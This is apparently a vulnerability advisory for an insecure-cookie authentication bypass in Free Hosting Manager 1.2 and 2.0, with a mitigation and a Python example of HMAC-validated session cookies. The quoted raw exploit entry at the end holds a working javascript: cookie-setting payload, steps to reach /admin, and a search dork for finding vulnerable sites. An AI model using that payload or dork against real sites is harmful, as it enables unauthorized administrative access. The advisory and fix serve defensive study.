Vendor: Free Hosting Manager
By: Scary-Boys
CVSS: 7.5 (HIGH)
Insecure Cookie Handling
CWE: 614
Product Name: Free Hosting Manager
Affected Version From: 1.2
Affected Version To: 2
Patch Exists: NO
2009

Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability

The admin panel of Free Hosting Manager 1.2 & 2.0 is vulnerable to insecure cookie handling: it only checks whether the cookies exist. An attacker can set the adminuser and loggedin cookies to 1, which gives them access to the admin panel.

Mitigation:

Ensure that the application validates the cookie values before using them.
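
An added example, not code from Free Hosting Manager or the original advisory, written in Python: the presence-only check described above beside a check that validates an HMAC-signed session cookie on the server. The cookie name `admin_session`, the `user|expiry|mac` layout, the key and the timeout are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

# Assumptions for this example: key, timeout, cookie name and layout are hypothetical.
SECRET_KEY = secrets.token_bytes(32)  # server-side only, never sent to the client
SESSION_TTL = 1800                    # seconds


def _mac(payload):
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def presence_only_check(cookies):
    """Flawed pattern from the advisory: any client-supplied value passes."""
    return "adminuser" in cookies and "loggedin" in cookies


def issue_admin_cookie(username, now=None):
    """Value for the admin_session cookie, issued only after a password login."""
    if "|" in username:
        raise ValueError("separator not allowed in username")
    expiry = int(time.time() if now is None else now) + SESSION_TTL
    payload = f"{username}|{expiry}"
    return f"{payload}|{_mac(payload)}"


def validated_check(cookies, now=None):
    """Return the admin username if the cookie is authentic and unexpired, else None."""
    parts = cookies.get("admin_session", "").split("|")
    if len(parts) != 3:
        return None
    username, expiry, mac = parts
    try:
        expected = _mac(f"{username}|{expiry}")
        # Constant-time comparison on bytes; rejects forged or edited values.
        if not hmac.compare_digest(mac.encode(), expected.encode()):
            return None
    except UnicodeEncodeError:
        return None
    # expiry is covered by the MAC, so it is a server-written integer here.
    if int(expiry) < (time.time() if now is None else now):
        return None
    return username


if __name__ == "__main__":
    forged = {"adminuser": "1", "loggedin": "1"}  # constructed: values from the advisory
    print(presence_only_check(forged), validated_check(forged))
```
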

Exploit-DB raw data:

#########################################################################
#                                                                       #
#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys                                               #
# HOME       : http://scary-boys.com                                    #
# Founded By : lvlr-Erfan                                               #
# Download   : http://www.fhm-script.com/download.php                   #
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : "Powered By Free Hosting Manager"                        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                                        #
# the admin panel only checks if the cookie exists.                     #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to "/admin" & Refresh      #
#                                                                       #
#########################################################################

# milw0rm.com [2008-08-06]